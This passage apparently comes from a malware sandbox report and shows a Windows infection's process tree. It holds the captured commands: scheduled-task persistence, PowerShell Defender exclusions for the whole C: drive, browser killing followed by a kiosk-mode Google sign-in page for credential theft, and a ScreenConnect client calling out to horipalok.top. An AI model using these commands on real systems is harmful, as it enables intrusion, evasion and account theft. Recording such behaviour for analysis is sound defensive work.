                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            PID:4740
                                                                                                                          • C:\Windows\System32\schtasks.exe
                                                                                                                            "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "smss" /tr "C:\Users\Admin\AppData\Local\Temp\smss.exe"
                                                                                                                            7⤵
                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                            PID:4996
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10381450101\223f2ee122.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10381450101\223f2ee122.exe"
                                                                                                                          6⤵
                                                                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                          • Checks BIOS information in registry
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Identifies Wine through registry keys
                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          PID:5400
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10381460101\d67f448215.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10381460101\d67f448215.exe"
                                                                                                                          6⤵
                                                                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                          • Checks BIOS information in registry
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Identifies Wine through registry keys
                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          PID:3008
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10381470101\aa551fc4d6.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10381470101\aa551fc4d6.exe"
                                                                                                                          6⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                          PID:3980
                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                            taskkill /F /IM firefox.exe /T
                                                                                                                            7⤵
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            • Kills process with taskkill
                                                                                                                            PID:1500
                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                            taskkill /F /IM chrome.exe /T
                                                                                                                            7⤵
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            • Kills process with taskkill
                                                                                                                            PID:5580
                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                            taskkill /F /IM msedge.exe /T
                                                                                                                            7⤵
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            • Kills process with taskkill
                                                                                                                            PID:4816
                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                            taskkill /F /IM opera.exe /T
                                                                                                                            7⤵
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            • Kills process with taskkill
                                                                                                                            PID:1784
                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                            taskkill /F /IM brave.exe /T
                                                                                                                            7⤵
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            • Kills process with taskkill
                                                                                                                            PID:1000
                                                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                                                                                            7⤵
                                                                                                                              PID:4408
                                                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                                                                                8⤵
                                                                                                                                • Checks processor information in registry
                                                                                                                                • Modifies registry class
                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                PID:4728
                                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1996 -prefsLen 27099 -prefMapHandle 2000 -prefMapSize 270279 -ipcHandle 2076 -initialChannelId {cfa70d91-6503-4daa-98e1-a2afed7a1ce4} -parentPid 4728 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4728" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
                                                                                                                                  9⤵
                                                                                                                                    PID:3248
                                                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2496 -prefsLen 27135 -prefMapHandle 2500 -prefMapSize 270279 -ipcHandle 2396 -initialChannelId {a1c4d6c9-57b3-4e8e-95e9-2c17042d075b} -parentPid 4728 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4728" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
                                                                                                                                    9⤵
                                                                                                                                      PID:3832
                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3956 -prefsLen 25164 -prefMapHandle 3960 -prefMapSize 270279 -jsInitHandle 3964 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3972 -initialChannelId {2425796d-fb69-44cb-b37a-411f6bdd8700} -parentPid 4728 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4728" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
                                                                                                                                      9⤵
                                                                                                                                      • Checks processor information in registry
                                                                                                                                      PID:2012
                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4120 -prefsLen 27276 -prefMapHandle 4124 -prefMapSize 270279 -ipcHandle 4208 -initialChannelId {aac6de26-3c81-447f-a5b6-1c01d057a805} -parentPid 4728 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4728" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
                                                                                                                                      9⤵
                                                                                                                                        PID:912
                                                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3048 -prefsLen 34775 -prefMapHandle 3052 -prefMapSize 270279 -jsInitHandle 3012 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4408 -initialChannelId {79cd859e-de44-4b2a-87db-3bc898fcfa9f} -parentPid 4728 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4728" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
                                                                                                                                        9⤵
                                                                                                                                        • Checks processor information in registry
                                                                                                                                        PID:1536
                                                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5016 -prefsLen 34824 -prefMapHandle 4664 -prefMapSize 270279 -ipcHandle 5100 -initialChannelId {10e24489-6fb7-4001-82ca-db1b3c80d5d4} -parentPid 4728 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4728" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
                                                                                                                                        9⤵
                                                                                                                                        • Checks processor information in registry
                                                                                                                                        PID:6516
                                                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5656 -prefsLen 32952 -prefMapHandle 5660 -prefMapSize 270279 -jsInitHandle 5664 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5652 -initialChannelId {7311f442-5ceb-4224-aed4-13896d63cacc} -parentPid 4728 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4728" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
                                                                                                                                        9⤵
                                                                                                                                        • Checks processor information in registry
                                                                                                                                        PID:5188
                                                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5856 -prefsLen 32952 -prefMapHandle 5860 -prefMapSize 270279 -jsInitHandle 5864 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5840 -initialChannelId {1e143150-7743-4227-84ed-d35e9ee286e8} -parentPid 4728 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4728" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
                                                                                                                                        9⤵
                                                                                                                                        • Checks processor information in registry
                                                                                                                                        PID:2164
                                                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 6036 -prefsLen 32952 -prefMapHandle 6040 -prefMapSize 270279 -jsInitHandle 6044 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6052 -initialChannelId {b05b23ff-f323-4f55-b246-250eac71540a} -parentPid 4728 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4728" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
                                                                                                                                        9⤵
                                                                                                                                        • Checks processor information in registry
                                                                                                                                        PID:2412
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\10381480101\c9118c79e3.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10381480101\c9118c79e3.exe"
                                                                                                                                  6⤵
                                                                                                                                  • Modifies Windows Defender DisableAntiSpyware settings
                                                                                                                                  • Modifies Windows Defender Real-time Protection settings
                                                                                                                                  • Modifies Windows Defender TamperProtection settings
                                                                                                                                  • Modifies Windows Defender notification settings
                                                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Identifies Wine through registry keys
                                                                                                                                  • Windows security modification
                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                  PID:1096
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\10381490101\785d049fd6.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10381490101\785d049fd6.exe"
                                                                                                                                  6⤵
                                                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Identifies Wine through registry keys
                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:7128
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\10381500101\ba8d2eef7c.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10381500101\ba8d2eef7c.exe"
                                                                                                                                  6⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:6816
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\10381510101\cbbec0393d.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10381510101\cbbec0393d.exe"
                                                                                                                                  6⤵
                                                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Identifies Wine through registry keys
                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:5468
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10381510101\cbbec0393d.exe"
                                                                                                                                    7⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:6652
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\10381520101\3ec792f250.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10381520101\3ec792f250.exe"
                                                                                                                                  6⤵
                                                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Identifies Wine through registry keys
                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                  PID:5968
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10381520101\3ec792f250.exe"
                                                                                                                                    7⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:6096
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\10381530101\86094f5a07.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10381530101\86094f5a07.exe"
                                                                                                                                  6⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                  PID:2936
                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                    7⤵
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:6348
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\10381540101\1456bf3b76.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10381540101\1456bf3b76.exe"
                                                                                                                                  6⤵
                                                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Identifies Wine through registry keys
                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:5504
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\10381550101\A9cowK5.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10381550101\A9cowK5.exe"
                                                                                                                                  6⤵
                                                                                                                                  • Checks computer location settings
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:3964
                                                                                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                    "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.4.4.9118\f63a82ffaf9f93d1\ScreenConnect.ClientSetup.msi"
                                                                                                                                    7⤵
                                                                                                                                    • Enumerates connected drives
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                    PID:6936
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\10381560101\EPTwCQd.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10381560101\EPTwCQd.exe"
                                                                                                                                  6⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                  PID:908
                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                    7⤵
                                                                                                                                      PID:2936
                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                      7⤵
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      PID:6416
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10381570101\102cd2d57a.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10381570101\102cd2d57a.exe"
                                                                                                                                    6⤵
                                                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Identifies Wine through registry keys
                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:6900
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6900 -s 716
                                                                                                                                      7⤵
                                                                                                                                      • Program crash
                                                                                                                                      PID:6716
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10381580101\u75a1_003.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10381580101\u75a1_003.exe"
                                                                                                                                    6⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                    PID:6368
                                                                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                      cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                                                                                                      7⤵
                                                                                                                                        PID:1964
                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                                                                                                          8⤵
                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                          PID:4692
                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                        "C:\Windows\system32\svchost.exe"
                                                                                                                                        7⤵
                                                                                                                                        • Downloads MZ/PE file
                                                                                                                                        • Adds Run key to start application
                                                                                                                                        PID:1868
                                                                                                                                        • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
                                                                                                                                          "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
                                                                                                                                          8⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:3868
                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            powershell Add-MpPreference -ExclusionPath C:\
                                                                                                                                            9⤵
                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                            PID:7468
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
                                                                                                                                          8⤵
                                                                                                                                          • Deletes itself
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:5660
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10381590101\7IIl2eE.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\10381590101\7IIl2eE.exe"
                                                                                                                                      6⤵
                                                                                                                                      • Checks computer location settings
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Drops file in Windows directory
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      PID:6500
                                                                                                                                      • C:\Windows\SysWOW64\CMD.exe
                                                                                                                                        "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
                                                                                                                                        7⤵
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:6260
                                                                                                                          • C:\Windows\system32\msiexec.exe
                                                                                                                            C:\Windows\system32\msiexec.exe /V
                                                                                                                            1⤵
                                                                                                                            • Enumerates connected drives
                                                                                                                            • Boot or Logon Autostart Execution: Authentication Package
                                                                                                                            • Drops file in Program Files directory
                                                                                                                            • Drops file in Windows directory
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            • Modifies registry class
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:4984
                                                                                                                            • C:\Windows\syswow64\MsiExec.exe
                                                                                                                              C:\Windows\syswow64\MsiExec.exe -Embedding D6D6C2DDA28774BDE53672C9E2D38E68 C
                                                                                                                              2⤵
                                                                                                                              • Loads dropped DLL
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:4656
                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSIF685.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240645843 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                                                                                                3⤵
                                                                                                                                • Loads dropped DLL
                                                                                                                                PID:1820
                                                                                                                            • C:\Windows\system32\srtasks.exe
                                                                                                                              C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
                                                                                                                              2⤵
                                                                                                                                PID:4072
                                                                                                                              • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                C:\Windows\syswow64\MsiExec.exe -Embedding 9717F87781E8728656147EE07323A3E4
                                                                                                                                2⤵
                                                                                                                                • Loads dropped DLL
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:3656
                                                                                                                              • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                C:\Windows\syswow64\MsiExec.exe -Embedding 53A8125B3CA50DDD7A5463683CC86AEF E Global\MSI0000
                                                                                                                                2⤵
                                                                                                                                • Loads dropped DLL
                                                                                                                                • Drops file in Windows directory
                                                                                                                                PID:5188
                                                                                                                              • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                C:\Windows\syswow64\MsiExec.exe -Embedding 6CA7EE31938D2B7901A06DFB00D15588 C
                                                                                                                                2⤵
                                                                                                                                • Loads dropped DLL
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:4784
                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI2F05.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240725812 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                                                                                                  3⤵
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:376
                                                                                                                              • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                C:\Windows\syswow64\MsiExec.exe -Embedding 8641ADD5B313136B0B0F75D25DDCA5B4
                                                                                                                                2⤵
                                                                                                                                • Loads dropped DLL
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:2096
                                                                                                                            • C:\Windows\system32\vssvc.exe
                                                                                                                              C:\Windows\system32\vssvc.exe
                                                                                                                              1⤵
                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                              PID:4960
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
                                                                                                                              1⤵
                                                                                                                                PID:6116
                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                  rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
                                                                                                                                  2⤵
                                                                                                                                    PID:5448
                                                                                                                                • C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.ClientService.exe
                                                                                                                                  "C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=horipalok.top&p=8880&s=1d832be3-5328-4238-b7ce-b0f2c0ffbc8f&k=BgIAAACkAABSU0ExAAgAAAEAAQC5i6E%2fahOoc3QJNQtEoGwqZ%2bCdopTN7JMVjs5O2%2byWcszBbL9cw0U4eUAs0O%2fTt9zZBA51c%2fc1w581kiibjAnZuVNxs1sd0hmNAlDUk8pZ2rgBfiLV%2bCX8Xr1w7PENGbO62O6bYrnCoADRGOr%2bDkAsD9fXZvt2bcWgAU%2fWsucxub7vyrOHFlg0dGlPivlEPgqdF06XmDqh%2bJaT9SNeX8GX5MokmbYgNKFgw6gHkSYgO0gvGb%2bWewn%2ftVekpiuFyJ1lPJvWo313f7%2bPZObMNedjqO8FM2Aja0gP8dtuw0AiY1EQOgSCC3o1fZAl%2fG4Li1yubMjusmlWyPSc3o3%2fusi%2b&t=30march"
                                                                                                                                  1⤵
                                                                                                                                  • Sets service image path in registry
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  • Drops file in System32 directory
                                                                                                                                  • Drops file in Windows directory
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                  PID:4900
                                                                                                                                  • C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsClient.exe
                                                                                                                                    "C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsClient.exe" "RunRole" "2f0b5e13-57bc-4a9a-aa1a-13a5bc7b4b6b" "User"
                                                                                                                                    2⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:6056
                                                                                                                                  • C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsClient.exe
                                                                                                                                    "C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsClient.exe" "RunRole" "b1a7235c-223e-4551-861e-f1095b3f0902" "System"
                                                                                                                                    2⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Drops file in System32 directory
                                                                                                                                    • Checks processor information in registry
                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                    PID:5340
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    "cmd.exe" /c "C:\Windows\SystemTemp\ScreenConnect\24.4.4.9118\utOfy7LpQUaArun.cmd"
                                                                                                                                    2⤵
                                                                                                                                      PID:6564
                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        powershell.exe -ExecutionPolicy Bypass -Command "Get-ChildItem 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\' | Where-Object { $_.PSChildName -match '^{.*}$' } | ForEach-Object { Set-ItemProperty -Path $_.PSPath -Name 'SystemComponent' -Value 1 -Type DWord; Write-Host 'Hiding program: ' $_.DisplayName }"
                                                                                                                                        3⤵
                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                        • Drops file in System32 directory
                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                        PID:4712
                                                                                                                                    • C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsClient.exe
                                                                                                                                      "C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsClient.exe" "RunRole" "70ec1237-279b-4faa-9df4-c43216e6685a" "System"
                                                                                                                                      2⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                      PID:1956
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                                                    1⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:1496
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                    1⤵
                                                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Identifies Wine through registry keys
                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    PID:2776
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\smss.exe
                                                                                                                                    1⤵
                                                                                                                                      PID:4304
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\smss.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\smss.exe
                                                                                                                                        2⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:2600
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                                                                                                      1⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:4908
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                      1⤵
                                                                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                      • Executes dropped EXE
